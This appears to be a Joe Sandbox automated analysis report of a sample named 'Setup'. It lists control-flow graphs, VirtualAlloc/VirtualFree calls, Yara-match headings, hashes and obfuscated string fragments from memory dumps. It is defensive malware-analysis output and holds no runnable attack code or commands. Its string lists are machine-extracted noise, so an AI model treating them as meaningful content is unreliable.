373->384 385 f9aed1-f9aed7 373->385 374->358 374->367 381 f9afef-f9aff1 call f9b3df 376->381 382 f9af9f-f9afa2 376->382 377->358 393 f9af26-f9af39 call f9c6cb 377->393 378->316 379->378 392 f9aff6-f9aff7 381->392 382->381 386 f9afa4-f9afa7 382->386 384->372 400 f9aee8-f9aeee 384->400 385->358 385->384 390 f9afa9-f9afab 386->390 391 f9afc0-f9afd1 call f9aaa0 386->391 390->391 395 f9afad-f9afb0 390->395 405 f9afd3-f9afdf call f9b07f 391->405 406 f9afe2-f9afed call f9a56c 391->406 396 f9aff8-f9afff 392->396 408 f9af3b-f9af3f 393->408 409 f9af5d-f9af96 393->409 401 f9afb2-f9afb5 395->401 402 f9afb7-f9afbe call f9bc4d 395->402 396->358 403 f9b001 396->403 400->358 400->372 401->396 401->402 402->392 403->403 405->406 406->392 408->409 413 f9af41-f9af44 408->413 409->358 418 f9af98 409->418 413->376 417 f9af46-f9af5b call f9c4ce 413->417 417->418 418->376
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F9AD29
                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 00F9B06D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$AllocFree
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2087232378-0
                                                                                                                      • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                      • Instruction ID: dea4f340a3b8c9ea57b379953a0d14966e4116164583b3f5f6cacf399ae5edd4
                                                                                                                      • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                      • Instruction Fuzzy Hash: 95B1E572900A02ABEF32AF60DD80BA7F7E8FF45324F100919F55996151E735E950EBD2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $"$"$#$$$&$&$*$,$-$.$/$1$2$3$6$<$>$?$@$@$B$B$B$C$C$D$D$D$D$D$D$E$F$H$H$J$K$L$L$L$M$N$N$O$P$Q$R$R$S$T$V$X$X$Y$Z$\$\$^$^$_$_$`$a$a$c$c$c$d$e$e$f$f$f$g$g$k$l$n$p$p$r$s$t$u$u$v$w$w$x$x$x$y$y$z$z${$|$}$~
                                                                                                                      • API String ID: 0-2021677360
                                                                                                                      • Opcode ID: e272b450acce53a6e6af77a1dca5bdd969495b0a5ef3ed9536c73b2781ae1e47
                                                                                                                      • Instruction ID: a9ad3c2e2269c302eef46caf11f411d997e57044b3650d899767d9aa07c5f82b
                                                                                                                      • Opcode Fuzzy Hash: e272b450acce53a6e6af77a1dca5bdd969495b0a5ef3ed9536c73b2781ae1e47
                                                                                                                      • Instruction Fuzzy Hash: C4139E3160C7C18AD335DB38C84439EBBE2ABD6324F188A6DE4E9873D2D77985459B13

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 870 f864e3-f86629 871 f8662b-f8662e 870->871 872 f86630-f86664 871->872 873 f86666-f866a3 871->873 872->871 874 f866a5-f866a8 873->874 875 f866aa-f866bf 874->875 876 f866c1-f8672b 874->876 875->874 877 f8672d-f86730 876->877 878 f86732-f86784 877->878 879 f86786-f867b4 877->879 878->877 880 f867b6-f867b9 879->880 881 f867bb-f867d0 880->881 882 f867d2-f8682e 880->882 881->880 883 f86830-f86833 882->883 884 f86880-f8689f 883->884 885 f86835-f8687e 883->885 886 f868a1-f868a4 884->886 885->883 887 f868ba-f868bd 886->887 888 f868a6-f868b8 886->888 889 f868bf-f868ca 887->889 888->886 890 f868cc 889->890 891 f868d1-f868e6 889->891 892 f86962-f86996 call f657fc * 2 890->892 893 f868e8 891->893 894 f868ea-f868f5 891->894 896 f86953-f86956 893->896 894->896 897 f868f7-f8694e call f8b70c 894->897 898 f86958 896->898 899 f8695a-f8695d 896->899 897->896 898->892 899->889
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $#$.$0$2$3$9$<$<$=$>$>$B$D$E$G$H$I$J$N$S$X$]$a$e$h$h$i$l$q$y$y$z$}$~
                                                                                                                      • API String ID: 0-394809611
                                                                                                                      • Opcode ID: 0d6d08487e955f9177916864f44ca78d6bbd7e72dd8cc35d350150198613bc5e
                                                                                                                      • Instruction ID: 9443779a17cc201b2930ad2f332994363fa1be8c3ef211a7c77833e9deb4247a
                                                                                                                      • Opcode Fuzzy Hash: 0d6d08487e955f9177916864f44ca78d6bbd7e72dd8cc35d350150198613bc5e
                                                                                                                      • Instruction Fuzzy Hash: 81E1D321D087E98EDB32C67C88043DDBFB15B22324F1843D9D4E9AB3D2C6754A46DB66

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 906 f74f8c-f7514d 907 f7515c-f7518c 906->907 907->907 908 f7518e-f75437 907->908 909 f7543c-f75484 908->909 909->909 910 f75486-f75675 909->910 911 f7567c-f756e1 910->911 911->911 912 f756e3-f758d2 911->912 913 f758dc-f75900 912->913 913->913 914 f75902-f75af7 913->914 915 f75afc-f75b5a 914->915 915->915 916 f75b5c-f75bc0 915->916
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #$$-G$=>$E@$IzJ|$IM$M~Kp$S&P8$WU$X[$]\$`"U$$`R`T$dVfh$k<l>$m^kP$o.] $o0e2$q4g6$rBtD$tv$},z.$HJ
                                                                                                                      • API String ID: 0-3675480717
                                                                                                                      • Opcode ID: 83e6b264bc1b687bb486f152c1103bd08daf09dee42d9de2b9037db0f02a905c
                                                                                                                      • Instruction ID: fb3de69a70034be87002c3990e641ce57fba025860df3de6d632c293735baa5e
                                                                                                                      • Opcode Fuzzy Hash: 83e6b264bc1b687bb486f152c1103bd08daf09dee42d9de2b9037db0f02a905c
                                                                                                                      • Instruction Fuzzy Hash: 92421BB160C7958AD330CF55D80278FBAF2FBC2304F40891DC5E96B216DBB5864A9B97

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 923 f61c96-f61cb2 924 f61cb4-f61cb7 923->924 925 f61d2a-f61d5a call f530fc 924->925 926 f61cb9-f61d28 924->926 929 f61d5e-f61d61 925->929 926->924 930 f61d63-f61d88 929->930 931 f61d8a-f61dbe call f657fc * 2 call f530fc 929->931 930->929 938 f61dc2-f61dc6 931->938 939 f61dc0-f61dec call f653ec 931->939 941 f627bf 938->941 947 f61df0-f61e31 call f5971c call f5be5c 939->947 948 f61dee 939->948 942 f63217 941->942 944 f63219-f63224 call f537bc 942->944 954 f60350-f63235 944->954 955 f60359-f60381 call f537cc 944->955 959 f61e33-f61e36 947->959 948->947 964 f60383-f60386 955->964 962 f61ea4-f61ecd call f530fc 959->962 963 f61e38-f61ea2 959->963 970 f61ed1-f61ef9 call f653ec 962->970 971 f61ecf 962->971 963->959 966 f603ab-f603d1 call f536bc 964->966 967 f60388-f603a9 964->967 975 f603d5 966->975 976 f603d3-f603f2 966->976 967->964 982 f61efd-f61f21 call f5971c call f5be5c 970->982 983 f61efb 970->983 973 f61f26-f61f5c call f653ec 971->973 987 f61f60-f61ffc call f5971c call f5be5c 973->987 988 f61f5e 973->988 975->944 980 f603f4-f603f7 976->980 985 f6044b-f6049c call f531fc 980->985 986 f603f9-f60449 980->986 982->973 983->982 985->942 995 f604a2-f604a9 985->995 986->980 999 f61ffe-f62001 987->999 988->987 995->942 1000 f62033-f62047 999->1000 1001 f62003-f62031 999->1001 1002 f6204b-f6205c call f5972c 1000->1002 1003 f62049-f6207a 1000->1003 1001->999 1011 f627bd 1002->1011 1007 f6207e-f620d4 call f5971c 1003->1007 1008 f6207c 1003->1008 1014 f620d6-f620fa call f5972c * 2 1007->1014 1015 f620ff-f6212a call f5972c 1007->1015 1008->1007 1011->941 1031 f627bb 1014->1031 1025 f6212c-f6212f 1015->1025 1027 f62151-f62175 call f530fc 1025->1027 1028 f62131-f6214f 1025->1028 1033 f62177-f6219a call f653ec 1027->1033 1034 f621cb-f621e3 1027->1034 1028->1025 1031->1011 1042 f6219e-f621c7 call f5971c call f5be5c 1033->1042 1043 f6219c 1033->1043 1036 f621e5-f621e8 1034->1036 1038 f62220-f62268 call f5340c 1036->1038 1039 f621ea-f6221e 1036->1039 1046 f6226c-f6226f 1038->1046 1039->1036 1042->1034 1043->1042 1047 f62271-f6229c 1046->1047 1048 f6229e-f622ce call f5330c 1046->1048 1047->1046 1054 f62664-f626fa call f5a1dc call f6668c call f5ad0c 1048->1054 1055 f622d4-f62304 call f537bc 1048->1055 1071 f62741-f62772 call f5972c * 2 1054->1071 1072 f626fc-f62714 1054->1072 1061 f62306 1055->1061 1062 f62308-f62326 call f5971c 1055->1062 1061->1062 1068 f6234e-f62350 1062->1068 1069 f62328-f62338 1062->1069 1070 f62352-f62359 1068->1070 1078 f6233a-f62346 call f6550c 1069->1078 1074 f62364-f623a8 call f537cc 1070->1074 1075 f6235b-f6235f 1070->1075 1104 f62774-f62787 call f5972c 1071->1104 1105 f62789-f62798 1071->1105 1085 f62716-f62718 1072->1085 1086 f62731-f6273d call f5972c 1072->1086 1090 f623aa-f623ad 1074->1090 1075->1054 1088 f62348-f6234c 1078->1088 1097 f6271a-f6272b call f6568c 1085->1097 1086->1071 1088->1068 1094 f623de-f6241b call f530fc 1090->1094 1095 f623af-f623dc 1090->1095 1106 f62422-f62425 1094->1106 1095->1090 1107 f6272f 1097->1107 1108 f6272d 1097->1108 1104->1105 1113 f627ad-f627b9 call f5a2bc 1105->1113 1114 f6279a-f627ab call f5972c 1105->1114 1111 f62427-f6243c 1106->1111 1112 f6243e-f6248a call f530fc 1106->1112 1107->1086 1108->1097 1111->1106 1121 f6248c-f6248f 1112->1121 1113->1031 1114->1113 1125 f62495-f62545 1121->1125 1126 f6254a-f6259a call f5340c 1121->1126 1125->1121 1130 f6259c-f6259f 1126->1130 1131 f62600-f6265f call f5340c call f6552c 1130->1131 1132 f625a1-f625d7 1130->1132 1131->1070 1133 f625db-f625fe 1132->1133 1134 f625d9 1132->1134 1133->1130 1134->1133
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$'$3$3$4$<$E$E$J$K$T$Y$^$n$r$y
                                                                                                                      • API String ID: 0-2456329422
                                                                                                                      • Opcode ID: 99042b384dec40b98c5d0a1ab103d5428fa5e031e8d578adf07787c5a93c25e9
                                                                                                                      • Instruction ID: ed89c2320936d304a53505bd86339a0bdbea4c3ead778c21ee04d32647c51988
                                                                                                                      • Opcode Fuzzy Hash: 99042b384dec40b98c5d0a1ab103d5428fa5e031e8d578adf07787c5a93c25e9
                                                                                                                      • Instruction Fuzzy Hash: 0162E832A0C7808BC764DF38C4953AEBBE1AF95314F19892ED8DD97381D6788945EB43

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1143 f79be9-f79c09 1144 f79c10-f79c22 call f5971c 1143->1144 1145 f79c0b 1143->1145 1148 f79c24-f79c2b 1144->1148 1149 f79c3d-f79cab 1144->1149 1145->1144 1150 f79c2c-f79c3b 1148->1150 1151 f79cac-f79cff 1149->1151 1150->1149 1150->1150 1151->1151 1152 f79d01-f79d0e 1151->1152 1153 f79d10-f79d17 1152->1153 1154 f79d2f 1152->1154 1156 f79d1c-f79d2b 1153->1156 1155 f79d33-f79d40 1154->1155 1157 f79d42-f79d4b 1155->1157 1158 f79d5f 1155->1158 1156->1156 1159 f79d2d 1156->1159 1160 f79d4c-f79d5b 1157->1160 1161 f79d63-f79d74 1158->1161 1159->1155 1160->1160 1162 f79d5d 1160->1162 1163 f79d76 1161->1163 1164 f79d7b-f79dad call f5971c 1161->1164 1162->1161 1163->1164 1167 f79dbc-f79de1 1164->1167 1167->1167 1168 f79de3-f79def 1167->1168 1169 f79df1-f79dfb 1168->1169 1170 f79e0d-f79e1a 1168->1170 1171 f79dfc-f79e0b 1169->1171 1172 f79e3d-f79e4a 1170->1172 1173 f79e1c-f79e20 1170->1173 1171->1170 1171->1171 1175 f79e4c-f79e60 1172->1175 1174 f79e2c-f79e3b 1173->1174 1174->1172 1174->1174 1175->1175 1176 f79e62-f79e9c call f7238c 1175->1176 1179 f79e9e-f79ea3 1176->1179 1180 f79eac-f79eae 1176->1180 1181 f79eb5-f79ecb call f5971c 1179->1181 1180->1181 1184 f79eed-f79f6b 1181->1184 1185 f79ecd-f79ed3 1181->1185 1187 f79f6c-f79fc2 1184->1187 1186 f79edc-f79eeb 1185->1186 1186->1184 1186->1186 1187->1187 1188 f79fc4-f79fd1 1187->1188 1189 f79fd3-f79fd6 1188->1189 1190 f79fed-f79ffa 1188->1190 1191 f79fdc-f79feb 1189->1191 1192 f7a02c 1190->1192 1193 f79ffc-f7a004 1190->1193 1191->1190 1191->1191 1195 f7a030-f7a03a 1192->1195 1194 f7a00c-f7a01b 1193->1194 1194->1194 1196 f7a01d 1194->1196 1197 f7a041-f7a075 call f5971c 1195->1197 1198 f7a03c 1195->1198 1196->1195 1201 f7a07c-f7a0a1 1197->1201 1198->1197 1201->1201 1202 f7a0a3-f7a0b2 1201->1202 1203 f7a0b4-f7a0b6 1202->1203 1204 f7a0cd-f7a0de 1202->1204 1207 f7a0bc-f7a0cb 1203->1207 1205 f7a0e0-f7a0eb 1204->1205 1206 f7a10c 1204->1206 1208 f7a0ec-f7a0fb 1205->1208 1209 f7a110-f7a11f 1206->1209 1207->1204 1207->1207 1208->1208 1210 f7a0fd 1208->1210 1211 f7a12c-f7a140 1209->1211 1210->1209 1211->1211 1212 f7a142-f7a15a call f7238c 1211->1212
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %B!D$(N3@$,J=L$@"_$$E*w,$EF$M:D<$O>^0$R.L $V2V4$Y6KH
                                                                                                                      • API String ID: 0-989434418
                                                                                                                      • Opcode ID: 6078bc0ade777d34a2ddf8fa3371973c5e06abd464537b3327961385a84a3245
                                                                                                                      • Instruction ID: 2c972b18dcd846158986c4c936b385ace9ffadab3d45b63a341f9d82f480e0d0
                                                                                                                      • Opcode Fuzzy Hash: 6078bc0ade777d34a2ddf8fa3371973c5e06abd464537b3327961385a84a3245
                                                                                                                      • Instruction Fuzzy Hash: E1D1CB7160C3108BC714DF68C89126BB7F2EFE6320F15991DE8D94B3A0E2B99906D757

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1215 f5cffa-f5d1da 1216 f5d1dc-f5d1fb 1215->1216 1216->1216 1217 f5d1fd-f5d41b 1216->1217 1219 f5d41c-f5d43b 1217->1219 1219->1219 1220 f5d43d-f5d45c 1219->1220
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !h=j$#HiJ$+p:r$0xz$2lMn$V(v*$ep$sT+V${$R&$~,s.$|+~
                                                                                                                      • API String ID: 0-1833152483
                                                                                                                      • Opcode ID: c195b33de5a408b3cc8a918af6e40a89a6b5ff3033b9111d650288c95cdd91a2
                                                                                                                      • Instruction ID: 729c01ffbf6d9288fa590fcffa5933af648c7e03c40a1c47945f6f9747c2210c
                                                                                                                      • Opcode Fuzzy Hash: c195b33de5a408b3cc8a918af6e40a89a6b5ff3033b9111d650288c95cdd91a2
                                                                                                                      • Instruction Fuzzy Hash: 36B1FDB08153408FE354DF168A89FA67FB1FB41610F1A82E8D6892F376C7359046CF99
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !@$,$@$C$C$D$E$F$H
                                                                                                                      • API String ID: 0-167259457
                                                                                                                      • Opcode ID: a8658c88cceae026a964532195ae745317ee3b30719fda5ab8108997b40a3c2b
                                                                                                                      • Instruction ID: d7450f6dad638a4b8ff9a72b475881cd69b6437c226801112476b6b07b558e19
                                                                                                                      • Opcode Fuzzy Hash: a8658c88cceae026a964532195ae745317ee3b30719fda5ab8108997b40a3c2b
                                                                                                                      • Instruction Fuzzy Hash: 7532C03260C7808FD368DF28C85136EBBE2ABD5320F198A2EE5D9873D1D77988459753
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: |8~$.H7J$0x8z$2\1^$<@>B$G,_.$SX+Z$Z$V&$j f"
                                                                                                                      • API String ID: 0-2903174340
                                                                                                                      • Opcode ID: 7cd789ec04f0b600f9527db159a9b866ca89a4aae64b4c1697764611260c43aa
                                                                                                                      • Instruction ID: 5ef2083fd4f61f775f5b27e9464e1e528c13a9a5f91013d46a1427319be8b436
                                                                                                                      • Opcode Fuzzy Hash: 7cd789ec04f0b600f9527db159a9b866ca89a4aae64b4c1697764611260c43aa
                                                                                                                      • Instruction Fuzzy Hash: 755133B48093948BD7789F11C9A23EABBF0FF86300F94492DD5C85B204DB755146DB87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 3<$@!H#$D%`'$J9e;$a-N/$lefg$z)e+$~=w?
                                                                                                                      • API String ID: 0-614847132
                                                                                                                      • Opcode ID: 4b53e16dd2b0918ff17c13154fc3fe6e4b8616ef8dc66ed430685e591bcd14af
                                                                                                                      • Instruction ID: 32cdaf084fe3cf30b6039ca07b762a0d9c60d17511fe1459729b1c7f43e97c14
                                                                                                                      • Opcode Fuzzy Hash: 4b53e16dd2b0918ff17c13154fc3fe6e4b8616ef8dc66ed430685e591bcd14af
                                                                                                                      • Instruction Fuzzy Hash: 9722F3726083009FD314EF24CC8579BFBE6EBC5324F28892DE995872A1D779D805CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: IVW$$%).$'{9"$A$LEKG$c~z5$wYY[
                                                                                                                      • API String ID: 0-3406648604
                                                                                                                      • Opcode ID: 7e02dff93018fb179fc1768eaaae457e716f1b753da8a7136ab0a030ac5e8075
                                                                                                                      • Instruction ID: 4e084a08786f6c2839223fd6e92cfa00c649eeba4fd1e407be53789a7abb6f97
                                                                                                                      • Opcode Fuzzy Hash: 7e02dff93018fb179fc1768eaaae457e716f1b753da8a7136ab0a030ac5e8075
                                                                                                                      • Instruction Fuzzy Hash: 8A52377190C3818FD725CF24D85076EBBE1AF96324F08867DE8D88B392D775890ADB52
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$4$b$o$x$|$}
                                                                                                                      • API String ID: 0-3023783532
                                                                                                                      • Opcode ID: c85f46a286bb54b62802cd9c50375cf097368bef13a6d6b31a6d92675efce217
                                                                                                                      • Instruction ID: ecb2b703404927aecf23ca50c9cddf5d4c58d40bd8f0357266cc9a15fadb1cf3
                                                                                                                      • Opcode Fuzzy Hash: c85f46a286bb54b62802cd9c50375cf097368bef13a6d6b31a6d92675efce217
                                                                                                                      • Instruction Fuzzy Hash: 4581F631D086998FCB21CB78C8503DDBBB1AB56324F1802D9D4A9AB3D1D7744A86CB52
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$8$?$e$g$}
                                                                                                                      • API String ID: 0-893667707
                                                                                                                      • Opcode ID: 72d96fd66839b40274155523ea4ae3a2a23f9b7d25032f6dc036cb9148fad6f5
                                                                                                                      • Instruction ID: 2b5bf61debe5f39c93b75d26f818137a94d14b2c2f88be815c7239fa76525307
                                                                                                                      • Opcode Fuzzy Hash: 72d96fd66839b40274155523ea4ae3a2a23f9b7d25032f6dc036cb9148fad6f5
                                                                                                                      • Instruction Fuzzy Hash: 3922FA7260C7908BD764DF38C85539EBBE1AFD4320F198A2EE9E9873D1D6748901A743
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 9NO9$9NO9$P!%M$bc$v
                                                                                                                      • API String ID: 0-4228005716
                                                                                                                      • Opcode ID: 5d673c6a1492cac4c16508e0cf3a4cd46a8514f6efee81578b4a9496add7f69d
                                                                                                                      • Instruction ID: b375909a33df1fa5c384807ea6dd2e1a72bcd22976bc0a2075ad77355ea77aad
                                                                                                                      • Opcode Fuzzy Hash: 5d673c6a1492cac4c16508e0cf3a4cd46a8514f6efee81578b4a9496add7f69d
                                                                                                                      • Instruction Fuzzy Hash: 62D1057264C3504FC324DF6888512ABFBE39BD1315F1C896CE9C68B346E675D90ADB82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DXVY$LO$RXTQ$s${b
                                                                                                                      • API String ID: 0-3953797783
                                                                                                                      • Opcode ID: 384be544a05cf0212a790266263dbb78d5a61deebf9d02b2ab0aeb1f156eea77
                                                                                                                      • Instruction ID: a7760fe49e24961c0b3c1392ec17730fa365042b32d301aeb5abddd7d7ac0e13
                                                                                                                      • Opcode Fuzzy Hash: 384be544a05cf0212a790266263dbb78d5a61deebf9d02b2ab0aeb1f156eea77
                                                                                                                      • Instruction Fuzzy Hash: E9B12671A0C3918AC7168F2984503ABFFE19FD7314F094A9DE8D49B382C675C90AD796
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5`ab$MN$O~$pK$q{
                                                                                                                      • API String ID: 0-4038937531
                                                                                                                      • Opcode ID: db77e357fa941e7d33d0442578188bd10af75528681f68ee881d21ee34501e2b
                                                                                                                      • Instruction ID: ce088cdecf96e7c475f7710a373ce239745ec5bed73bde90a8ebab905b60129a
                                                                                                                      • Opcode Fuzzy Hash: db77e357fa941e7d33d0442578188bd10af75528681f68ee881d21ee34501e2b
                                                                                                                      • Instruction Fuzzy Hash: DB812075A083018BC714DF64C8A176BB7F1EFE5320F18991CE8D64B391E7B99809E356
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !"6C$!RSP$+$qbU"
                                                                                                                      • API String ID: 0-828761533
                                                                                                                      • Opcode ID: 1260f50ac6a2a57a08ce748d27c980efe09cc30cbcc203280ef10adf9a11e22f
                                                                                                                      • Instruction ID: f6cde9826cac6e67b362c596fbc2001c1371884ad4cb58f9d87505117b94d49f
                                                                                                                      • Opcode Fuzzy Hash: 1260f50ac6a2a57a08ce748d27c980efe09cc30cbcc203280ef10adf9a11e22f
                                                                                                                      • Instruction Fuzzy Hash: F8D143B164C7408BD318DF75C8946ABFBE2EBD1305F188A3CE99287351DB788509CB4A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EL$GD$WO$]xyz
                                                                                                                      • API String ID: 0-4149224771
                                                                                                                      • Opcode ID: fa3411b28c087caa1b9ee02d9539c3d469a08a1208c7a0a5f4e75583e8340953
                                                                                                                      • Instruction ID: daadd7c082387ae29b034454126def606ab08f5b706dfc40d03cf68ecf65ee32
                                                                                                                      • Opcode Fuzzy Hash: fa3411b28c087caa1b9ee02d9539c3d469a08a1208c7a0a5f4e75583e8340953
                                                                                                                      • Instruction Fuzzy Hash: 15A10476908311CBD724DF28C85266BB7F1EF82320F18995DE8D88B390E738D905D79A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
